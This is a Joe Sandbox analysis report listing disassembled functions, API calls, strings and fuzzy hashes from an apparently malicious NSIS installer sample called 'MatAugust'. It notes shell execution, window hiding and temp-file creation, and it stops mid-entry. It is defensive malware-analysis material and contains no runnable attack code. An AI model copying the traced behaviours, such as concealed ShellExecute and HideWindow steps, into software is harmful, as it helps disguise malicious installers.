Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
<RM>, xrefs: 00402713
open, xrefs: 00402770

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
API String ID: 247603264-1827671502
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

